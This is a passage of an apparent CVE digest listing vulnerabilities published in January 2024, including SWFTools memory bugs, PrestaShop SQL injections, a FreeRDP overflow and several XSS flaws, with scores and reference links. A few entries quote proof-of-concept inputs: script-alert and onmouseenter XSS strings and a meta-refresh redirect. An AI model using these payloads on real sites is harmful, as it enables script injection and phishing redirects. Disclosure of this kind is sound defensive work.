https://vuldb.com/?ctiid.251674 | source : cna@vuldb.com
https://vuldb.com/?id.251674 | source : cna@vuldb.com
https://youtu.be/f_4eHkISrZg | source : cna@vuldb.com

Vulnerability : CWE-119


Vulnerability ID : CVE-2024-0713

First published on : 19-01-2024 14:15:13
Last modified on : 19-01-2024 15:56:19

Description :
A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0713
Source : cna@vuldb.com
CVSS Score : 4.7

References :
https://drive.google.com/file/d/1C6_4A-96BtR9VTNSadUY09ErroqLEVJ4/view?usp=sharing | source : cna@vuldb.com
https://vuldb.com/?ctiid.251539 | source : cna@vuldb.com
https://vuldb.com/?id.251539 | source : cna@vuldb.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2024-0728

First published on : 19-01-2024 19:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.

CVE ID : CVE-2024-0728
Source : cna@vuldb.com
CVSS Score : 4.7

References :
https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251551 | source : cna@vuldb.com
https://vuldb.com/?id.251551 | source : cna@vuldb.com

Vulnerability : CWE-73


Vulnerability ID : CVE-2024-0770

First published on : 21-01-2024 23:15:44
Last modified on : 22-01-2024 14:01:09

Description :
A vulnerability, which was classified as critical, was found in European Chemicals Agency IUCLID 7.10.3 on Windows. Affected is an unknown function of the file iuclid6.exe of the component Desktop Installer. The manipulation leads to incorrect default permissions. The attack needs to be approached locally. VDB-251670 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0770
Source : cna@vuldb.com
CVSS Score : 4.4

References :
https://imagebin.ca/v/7nx8zv3l62Kf | source : cna@vuldb.com
https://vuldb.com/?ctiid.251670 | source : cna@vuldb.com
https://vuldb.com/?id.251670 | source : cna@vuldb.com

Vulnerability : CWE-276


Vulnerability ID : CVE-2024-0726

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability.

CVE ID : CVE-2024-0726
Source : cna@vuldb.com
CVSS Score : 4.3

References :
https://torada.notion.site/Reflected-Cross-site-scripting-at-Project-Allocation-System-d94c7c489c2d48efa23b21a90dd0e03f?pvs=4 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251549 | source : cna@vuldb.com
https://vuldb.com/?id.251549 | source : cna@vuldb.com

Vulnerability : CWE-79


Source : fluidattacks.com

Vulnerability ID : CVE-2024-0430

First published on : 22-01-2024 19:15:09
Last modified on : 22-01-2024 20:28:17

Description :
IObit Malware Fighter v11.0.0.1274 is vulnerable to a Denial of Service vulnerability by triggering the 0x8001E00C IOCTL code of the ImfHpRegFilter.sys driver.

CVE ID : CVE-2024-0430
Source : help@fluidattacks.com
CVSS Score : 5.5

References :
https://fluidattacks.com/advisories/davis/ | source : help@fluidattacks.com
https://www.iobit.com/en/malware-fighter.php | source : help@fluidattacks.com

Vulnerability : CWE-400


(13) LOW VULNERABILITIES [0.1, 3.9]

Source : github.com

Vulnerability ID : CVE-2024-22211

First published on : 19-01-2024 20:15:13
Last modified on : 19-01-2024 22:52:48

Description :
FreeRDP is a set of free and open source remote desktop protocol library and clients. In affected versions an integer overflow in `freerdp_bitmap_planar_context_reset` leads to heap-buffer overflow. This affects FreeRDP based clients. FreeRDP based server implementations and proxy are not affected. A malicious server could prepare a `RDPGFX_RESET_GRAPHICS_PDU` to allocate too small buffers, possibly triggering later out of bound read/write. Data extraction over network is not possible, the buffers are used to display an image. This issue has been addressed in version 2.11.5 and 3.2.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.

CVE ID : CVE-2024-22211
Source : security-advisories@github.com
CVSS Score : 3.7

References :
https://github.com/FreeRDP/FreeRDP/commit/939e922936e9c3ae8fc204968645e5e7563a2fff | source : security-advisories@github.com
https://github.com/FreeRDP/FreeRDP/commit/aeac3040cc99eeaff1e1171a822114c857b9dca9 | source : security-advisories@github.com
https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-rjhp-44rv-7v59 | source : security-advisories@github.com

Vulnerability : CWE-122
Vulnerability : CWE-190


Vulnerability ID : CVE-2024-23329

First published on : 19-01-2024 20:15:13
Last modified on : 19-01-2024 22:52:48

Description :
changedetection.io is an open source tool designed to monitor websites for content changes. In affected versions the API endpoint `/api/v1/watch/<uuid>/history` can be accessed by any unauthorized user. As a result any unauthorized user can check one's watch history. However, because an unauthorized party first needs to know a watch UUID, and the watch history endpoint itself returns only paths to the snapshot on the server, the impact on users' data privacy is minimal. This issue has been addressed in version 0.45.13. Users are advised to upgrade. There are no known workarounds for this vulnerability.

CVE ID : CVE-2024-23329
Source : security-advisories@github.com
CVSS Score : 3.7

References :
https://github.com/dgtlmoon/changedetection.io/commit/402f1e47e78ecd155b1e90f30cce424ff7763e0f | source : security-advisories@github.com
https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-hcvp-2cc7-jrwr | source : security-advisories@github.com

Vulnerability : CWE-863


Source : vuldb.com

Vulnerability ID : CVE-2024-0720

First published on : 19-01-2024 16:15:11
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0720
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link | source : cna@vuldb.com
https://vuldb.com/?ctiid.251544 | source : cna@vuldb.com
https://vuldb.com/?id.251544 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-0721

First published on : 19-01-2024 16:15:11
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability.

CVE ID : CVE-2024-0721
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://github.com/sweatxi/BugHub/blob/main/jspXCMS-%20Survey%20label.pdf | source : cna@vuldb.com
https://vuldb.com/?ctiid.251545 | source : cna@vuldb.com
https://vuldb.com/?id.251545 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-0722

First published on : 19-01-2024 17:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability was found in code-projects Social Networking Site 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file message.php of the component Message Page. The manipulation of the argument Story leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251546 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0722
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://drive.google.com/file/d/1r-4P-gWuIxuVL2QdOXsqN6OTRtQEmo7P/view?usp=drive_link | source : cna@vuldb.com
https://vuldb.com/?ctiid.251546 | source : cna@vuldb.com
https://vuldb.com/?id.251546 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-0773

First published on : 22-01-2024 00:15:07
Last modified on : 22-01-2024 14:01:09

Description :
A vulnerability classified as problematic was found in CodeAstro Internet Banking System 1.0. Affected by this vulnerability is an unknown functionality of the file pages_client_signup.php. The manipulation of the argument Client Full Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251677 was assigned to this vulnerability.

CVE ID : CVE-2024-0773
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://drive.google.com/drive/folders/1YjJFvxis3gLWX95990Y-nJMbWCQHB02U?usp=sharing | source : cna@vuldb.com
https://vuldb.com/?ctiid.251677 | source : cna@vuldb.com
https://vuldb.com/?id.251677 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-0776

First published on : 22-01-2024 01:15:08
Last modified on : 22-01-2024 14:01:09

Description :
A vulnerability, which was classified as problematic, has been found in LinZhaoguan pb-cms 2.0. Affected by this issue is some unknown functionality of the component Comment Handler. The manipulation with the input <div onmouseenter="alert("xss)"> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251678 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0776
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://github.com/sweatxi/BugHub/blob/main/Pbcms%20Background%20recovery%20store%20xss.pdf | source : cna@vuldb.com
https://vuldb.com/?ctiid.251678 | source : cna@vuldb.com
https://vuldb.com/?id.251678 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-0781

First published on : 22-01-2024 16:15:08
Last modified on : 22-01-2024 19:10:26

Description :
A vulnerability, which was classified as problematic, was found in CodeAstro Internet Banking System 1.0. This affects an unknown part of the file pages_client_signup.php. The manipulation of the argument Client Full Name with the input <meta http-equiv="refresh" content="0; url=https://vuldb.com" /> leads to open redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251697 was assigned to this vulnerability.

CVE ID : CVE-2024-0781
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://drive.google.com/drive/folders/1f61RXqelSDY0T92aLjmb8BhgAHt_eeUS | source : cna@vuldb.com
https://vuldb.com/?ctiid.251697 | source : cna@vuldb.com
https://vuldb.com/?id.251697 | source : cna@vuldb.com

Vulnerability : CWE-601


Vulnerability ID : CVE-2024-0782

First published on : 22-01-2024 17:15:09
Last modified on : 22-01-2024 19:10:26

Description :
A vulnerability has been found in CodeAstro Online Railway Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file pass-profile.php. The manipulation of the argument First Name/Last Name/User Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251698 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0782
Source : cna@vuldb.com
CVSS Score : 3.5

References :
https://drive.google.com/drive/folders/1ecVTReqCS_G8svyq3MG79E2y59psMcPn?usp=sharing | source : cna@vuldb.com
https://vuldb.com/?ctiid.251698 | source : cna@vuldb.com
https://vuldb.com/?id.251698 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2024-0716

First published on : 19-01-2024 15:15:09
Last modified on : 19-01-2024 15:56:19

Description :
A vulnerability classified as problematic has been found in Beijing Baichuo Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0716
Source : cna@vuldb.com
CVSS Score : 3.1

References :
https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251541 | source : cna@vuldb.com
https://vuldb.com/?id.251541 | source : cna@vuldb.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2024-0718

First published on : 19-01-2024 16:15:11
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543.

CVE ID : CVE-2024-0718
Source : cna@vuldb.com
CVSS Score : 2.4

References :
https://github.com/biantaibao/zhglxt_xss/blob/main/xss.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251543 | source : cna@vuldb.com
https://vuldb.com/?id.251543 | source : cna@vuldb.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2016-15037

First published on : 21-01-2024 06:15:08
Last modified on : 22-01-2024 14:01:14

Description :
A vulnerability, which was classified as problematic, has been found in go4rayyan Scumblr up to 2.0.1a. Affected by this issue is some unknown functionality of the component Task Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.2 is able to address this issue. The patch is identified as 5c9120f2362ddb7cbe48f2c4620715adddc4ee35. It is recommended to upgrade the affected component. VDB-251570 is the identifier assigned to this vulnerability.

CVE ID : CVE-2016-15037
Source : cna@vuldb.com
CVSS Score : 2.4

References :
https://github.com/go4rayyan/CG1/commit/5c9120f2362ddb7cbe48f2c4620715adddc4ee35 | source : cna@vuldb.com
https://github.com/go4rayyan/CG1/releases/tag/v2.0.2 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251570 | source : cna@vuldb.com
https://vuldb.com/?id.251570 | source : cna@vuldb.com

Vulnerability : CWE-79


Source : lenovo.com

Vulnerability ID : CVE-2023-5081

First published on : 19-01-2024 20:15:12
Last modified on : 19-01-2024 22:52:48

Description :
An information disclosure vulnerability was reported in the Lenovo Tab M8 HD that could allow a local application to gather a non-resettable device identifier.

CVE ID : CVE-2023-5081
Source : psirt@lenovo.com
CVSS Score : 3.3

References :
https://support.lenovo.com/us/en/product_security/LEN-142135 | source : psirt@lenovo.com

Vulnerability : CWE-200


(93) NO SCORE VULNERABILITIES [0.0, 0.0]

Source : jpcert.or.jp

Vulnerability ID : CVE-2024-23387

First published on : 19-01-2024 04:15:09
Last modified on : 19-01-2024 15:56:26

Description :
FusionPBX prior to 5.1.0 contains a cross-site scripting vulnerability. If this vulnerability is exploited by a remote authenticated attacker with an administrative privilege, an arbitrary script may be executed on the web browser of the user who is logging in to the product.

CVE ID : CVE-2024-23387
Source : vultures@jpcert.or.jp
CVSS Score : /

References :
https://github.com/fusionpbx/fusionpbx/ | source : vultures@jpcert.or.jp
https://jvn.jp/en/jp/JVN67215338/ | source : vultures@jpcert.or.jp
https://www.fusionpbx.com/ | source : vultures@jpcert.or.jp


Vulnerability ID : CVE-2024-22113

First published on : 22-01-2024 05:15:09
Last modified on : 22-01-2024 14:01:09

Description :
Open redirect vulnerability in Access analysis CGI An-Analyzer released in 2023 December 31 and earlier allows a remote unauthenticated attacker to redirect users to arbitrary websites and conduct phishing attacks via a specially crafted URL.

CVE ID : CVE-2024-22113
Source : vultures@jpcert.or.jp
CVSS Score : /

References :
https://jvn.jp/en/jp/JVN73587943/ | source : vultures@jpcert.or.jp
https://www.anglers-net.com/anlog/update/ | source : vultures@jpcert.or.jp


Source : mitre.org

Vulnerability ID : CVE-2024-23659

First published on : 19-01-2024 05:15:09
Last modified on : 19-01-2024 15:56:26

Description :
SPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js.

CVE ID : CVE-2024-23659
Source : cve@mitre.org
CVSS Score : /

References :
https://blog.spip.net/Mise-a-jour-de-maintenance-et-securite-sortie-de-SPIP-4-2-8-SPIP-4-1-14.html?lang=fr | source : cve@mitre.org
https://git.spip.net/spip/bigup/commit/0757f015717cb72b84dba0e9a375ec71caddf1c2 | source : cve@mitre.org
https://git.spip.net/spip/bigup/commit/ada821c076d67d1147a195178223d0b4a6d8cecc | source : cve@mitre.org


Vulnerability ID : CVE-2023-27168

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:26

Description :
An arbitrary file upload vulnerability in Xpand IT Write-back Manager v2.3.1 allows attackers to execute arbitrary code via a crafted jsp file.

CVE ID : CVE-2023-27168
Source : cve@mitre.org
CVSS Score : /

References :
https://balwurk.com | source : cve@mitre.org
https://balwurk.github.io/CVE-2023-27168/ | source : cve@mitre.org
https://writeback4t.com | source : cve@mitre.org
https://www.xpand-it.com | source : cve@mitre.org


Vulnerability ID : CVE-2023-43985

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
SunnyToo stblogsearch up to v1.0.0 was discovered to contain a SQL injection vulnerability via the StBlogSearchClass::prepareSearch component.

CVE ID : CVE-2023-43985
Source : cve@mitre.org
CVSS Score : /

References :
https://security.friendsofpresta.org/modules/2024/01/18/stblogsearch.html | source : cve@mitre.org
https://www.sunnytoo.com/product/panda-creative-responsive-prestashop-theme | source : cve@mitre.org


Vulnerability ID : CVE-2023-46351

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
In the module mib < 1.6.1 from MyPresta.eu for PrestaShop, a guest can perform SQL injection. The method `mib::getManufacturersByCategory()` has sensitive SQL calls that can be executed with a trivial HTTP call and exploited to forge a SQL injection.

CVE ID : CVE-2023-46351
Source : cve@mitre.org
CVSS Score : /

References :
https://mypresta.eu/modules/front-office-features/manufacturers-brands-images-block.html | source : cve@mitre.org
https://security.friendsofpresta.org/modules/2024/01/18/mib.html | source : cve@mitre.org


Vulnerability ID : CVE-2023-50028

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
In the module "Sliding cart block" (blockslidingcart) up to version 2.3.8 from PrestashopModules.eu for PrestaShop, a guest can perform SQL injection.

CVE ID : CVE-2023-50028
Source : cve@mitre.org
CVSS Score : /

References :
https://addons.prestashop.com/en/express-checkout-process/3321-block-sliding-cart.html | source : cve@mitre.org
https://security.friendsofpresta.org/modules/2024/01/16/blockslidingcart.html | source : cve@mitre.org


Vulnerability ID : CVE-2023-50030

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
In the module "Jms Setting" (jmssetting) from Joommasters for PrestaShop, a guest can perform SQL injection in versions <= 1.1.0. The method `JmsSetting::getSecondImgs()` has a sensitive SQL call that can be executed with a trivial HTTP call and exploited to forge a blind SQL injection.

CVE ID : CVE-2023-50030
Source : cve@mitre.org
CVSS Score : /

References :
https://security.friendsofpresta.org/modules/2024/01/16/jmssetting.html | source : cve@mitre.org
https://www.joommasters.com/ | source : cve@mitre.org


Vulnerability ID : CVE-2023-51946

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
Multiple reflected cross-site scripting (XSS) vulnerabilities in nasSvr.php in actidata actiNAS-SL-2U-8 3.2.03-SP1 allow remote attackers to inject arbitrary web script or HTML.

CVE ID : CVE-2023-51946
Source : cve@mitre.org
CVSS Score : /

References :
http://actidata.com | source : cve@mitre.org
https://github.com/saw-your-packet/CVEs/blob/main/CVE-2023-51946/README.md | source : cve@mitre.org
https://www.actidata.com/index.php/de-de/actinas-plus-sl-2u-8-rdx | source : cve@mitre.org


Vulnerability ID : CVE-2023-51947

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
Improper access control on nasSvr.php in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to read and modify different types of data without authentication.

CVE ID : CVE-2023-51947
Source : cve@mitre.org
CVSS Score : /

References :
http://actinas-plus-sl-2u-8-rdx.com | source : cve@mitre.org
https://github.com/saw-your-packet/CVEs/blob/main/CVE-2023-51947/README.md | source : cve@mitre.org
https://www.actidata.com/index.php/de-de/actinas-plus-sl-2u-8-rdx | source : cve@mitre.org


Vulnerability ID : CVE-2023-51948

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
A Site-wide directory listing vulnerability in /fm in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to list the files hosted by the web application.

CVE ID : CVE-2023-51948
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/saw-your-packet/CVEs/blob/main/CVE-2023-51948/README.md | source : cve@mitre.org
https://www.actidata.com/index.php/de-de/actinas-plus-sl-2u-8-rdx | source : cve@mitre.org


Vulnerability ID : CVE-2024-22876

First published on : 19-01-2024 14:15:13
Last modified on : 19-01-2024 15:56:19

Description :
StrangeBee TheHive 5.1.0 to 5.1.9 and 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case attachment functionality, which enables an attacker to upload a malicious HTML file with JavaScript code that will be executed in the context of the TheHive application using a specific URL. The vulnerability can be used to coerce a victim account to perform specific actions on the application, such as helping an analyst become an administrator.

CVE ID : CVE-2024-22876
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/StrangeBeeCorp/Security/blob/main/Security%20advisories/SB-SEC-ADV-2023-002.md | source : cve@mitre.org


Vulnerability ID : CVE-2024-22877

First published on : 19-01-2024 14:15:13
Last modified on : 19-01-2024 15:56:19

Description :
StrangeBee TheHive 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case reporting functionality. This feature allows an attacker to insert malicious JavaScript code inside the template or its variables, that will be executed in the context of the TheHive application when the HTML report is opened.

CVE ID : CVE-2024-22877
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/StrangeBeeCorp/Security/blob/main/Security%20advisories/SB-SEC-ADV-2023-001.md | source : cve@mitre.org


Vulnerability ID : CVE-2024-22562

First published on : 19-01-2024 15:15:09
Last modified on : 19-01-2024 15:56:19

Description :
swftools 0.9.2 was discovered to contain a Stack Buffer Underflow via the function dict_foreach_keyvalue at swftools/lib/q.c.

CVE ID : CVE-2024-22562
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/210 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22563

First published on : 19-01-2024 15:15:09
Last modified on : 19-01-2024 15:56:19

Description :
openvswitch 2.17.8 was discovered to contain a memory leak via the function xmalloc__ in openvswitch-2.17.8/lib/util.c.

CVE ID : CVE-2024-22563
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/openvswitch/ovs-issues/issues/315 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22920

First published on : 19-01-2024 15:15:09
Last modified on : 19-01-2024 15:56:19

Description :
swftools 0.9.2 was discovered to contain a heap-use-after-free via the function bufferWriteData in swftools/lib/action/compile.c.

CVE ID : CVE-2024-22920
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/211 | source : cve@mitre.org


Vulnerability ID : CVE-2023-47033

First published on : 19-01-2024 17:15:08
Last modified on : 19-01-2024 18:48:55

Description :
MultiSigWallet 0xF0C99 was discovered to contain a reentrancy vulnerability via the function executeTransaction.

CVE ID : CVE-2023-47033
Source : cve@mitre.org
CVSS Score : /

References :
https://etherscan.io/address/0xF0C9975eFd521282c2DF55774251912d691aC4d9 | source : cve@mitre.org
https://github.com/RikkaLzw/CVE/blob/main/CVE-2024.1.19.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-47034

First published on : 19-01-2024 17:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability in UniswapFrontRunBot 0xdB94c allows attackers to cause financial losses via unspecified vectors.

CVE ID : CVE-2023-47034
Source : cve@mitre.org
CVSS Score : /

References :
https://etherscan.io/address/0xdB94c67460DdaA9D6a9d6a2B855B5440f9afEb7C | source : cve@mitre.org
https://github.com/RikkaLzw/CVE/blob/main/CVE-2024.1.19-2.md | source : cve@mitre.org


Vulnerability ID : CVE-2024-22911

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A stack-buffer-underflow vulnerability was found in SWFTools v0.9.2, in the function parseExpression at src/swfc.c:2602.

CVE ID : CVE-2024-22911
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/216 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22912

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A global-buffer-overflow was found in SWFTools v0.9.2, in the function countline at swf5compiler.flex:327. It allows an attacker to cause code execution.

CVE ID : CVE-2024-22912
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/212 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22913

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A heap-buffer-overflow was found in SWFTools v0.9.2, in the function swf5lex at lex.swf5.c:1321. It allows an attacker to cause code execution.

CVE ID : CVE-2024-22913
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/213 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22914

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A heap-use-after-free was found in SWFTools v0.9.2, in the function input at lex.swf5.c:2620. It allows an attacker to cause denial of service.

CVE ID : CVE-2024-22914
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/214 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22915

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A heap-use-after-free was found in SWFTools v0.9.2, in the function swf_DeleteTag at rfxswf.c:1193. It allows an attacker to cause code execution.

CVE ID : CVE-2024-22915
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/215 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22919

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
swftools 0.9.2 was discovered to contain a global-buffer-overflow vulnerability via the function parseExpression at swftools/src/swfc.c:2587.

CVE ID : CVE-2024-22919
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/209 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22955

First published on : 19-01-2024 18:15:09
Last modified on : 19-01-2024 18:48:55

Description :
swftools 0.9.2 was discovered to contain a stack-buffer-underflow vulnerability via the function parseExpression at swftools/src/swfc.c:2576.

CVE ID : CVE-2024-22955
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/207 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22956

First published on : 19-01-2024 18:15:09
Last modified on : 19-01-2024 18:48:55

Description :
swftools 0.9.2 was discovered to contain a heap-use-after-free vulnerability via the function removeFromTo at swftools/src/swfc.c:838.

CVE ID : CVE-2024-22956
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/208 | source : cve@mitre.org


Vulnerability ID : CVE-2024-22957

First published on : 19-01-2024 18:15:09
Last modified on : 19-01-2024 18:48:55

Description :
swftools 0.9.2 was discovered to contain an Out-of-bounds Read vulnerability via the function dict_do_lookup in swftools/lib/q.c:1190.

CVE ID : CVE-2024-22957
Source : cve@mitre.org
CVSS Score : /

References :
https://github.com/matthiaskramm/swftools/issues/206 | source : cve@mitre.org


Vulnerability ID : CVE-2023-33295

First published on : 19-01-2024 20:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Cohesity DataProtect 6.8.1 and 6.6.0d was discovered to have an incorrect access control vulnerability due to a lack of TLS Certificate Validation.

CVE ID : CVE-2023-33295
Source : cve@mitre.org
CVSS Score : /

References :
https://cohesity.com | source : cve@mitre.org
https://github.com/cohesity/SecAdvisory/blob/master/CVE-2023-33295.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-43956

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 20:15:11

Description :
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: CVE-2023-36263. Reason: This record is a duplicate of CVE-2023-36263. Notes: All CVE users should reference CVE-2023-36263 instead of this record. All references and descriptions in this record have been removed to prevent accidental usage.

CVE ID : CVE-2023-43956
Source : cve@mitre.org
CVSS Score : /

References :


Vulnerability ID : CVE-2023-45485

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 20:15:11

Description :
Rejected reason: DO NOT USE THIS CVE RECORD. ConsultIDs: none. Reason: This record was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.

CVE ID : CVE-2023-45485
Source : cve@mitre.org
CVSS Score : /

References :


Vulnerability ID : CVE-2023-47035

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
RPTC 0x3b08c was discovered to not conduct status checks on the parameter tradingOpen. This vulnerability can allow attackers to conduct unauthorized transfer operations.

CVE ID : CVE-2023-47035
Source : cve@mitre.org
CVSS Score : /

References :
https://etherscan.io/token/0x3b08c03fa8278cf81b9043b228183760376fcdbb | source : cve@mitre.org
https://github.com/RikkaLzw/CVE/blob/main/CVE-2024.1.19-3.md | source : cve@mitre.org


Vulnerability ID : CVE-2023-50447

First published on : 19-01-2024 20:15:11
Last modified on : 20-01-2024 18:15:31

Description :
Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter).

CVE ID : CVE-2023-50447
Source : cve@mitre.org
CVSS Score : /

References :
http://www.openwall.com/lists/oss-security/2024/01/20/1 | source : cve@mitre.org
https://devhub.checkmarx.com/cve-details/CVE-2023-50447/ | source : cve@mitre.org
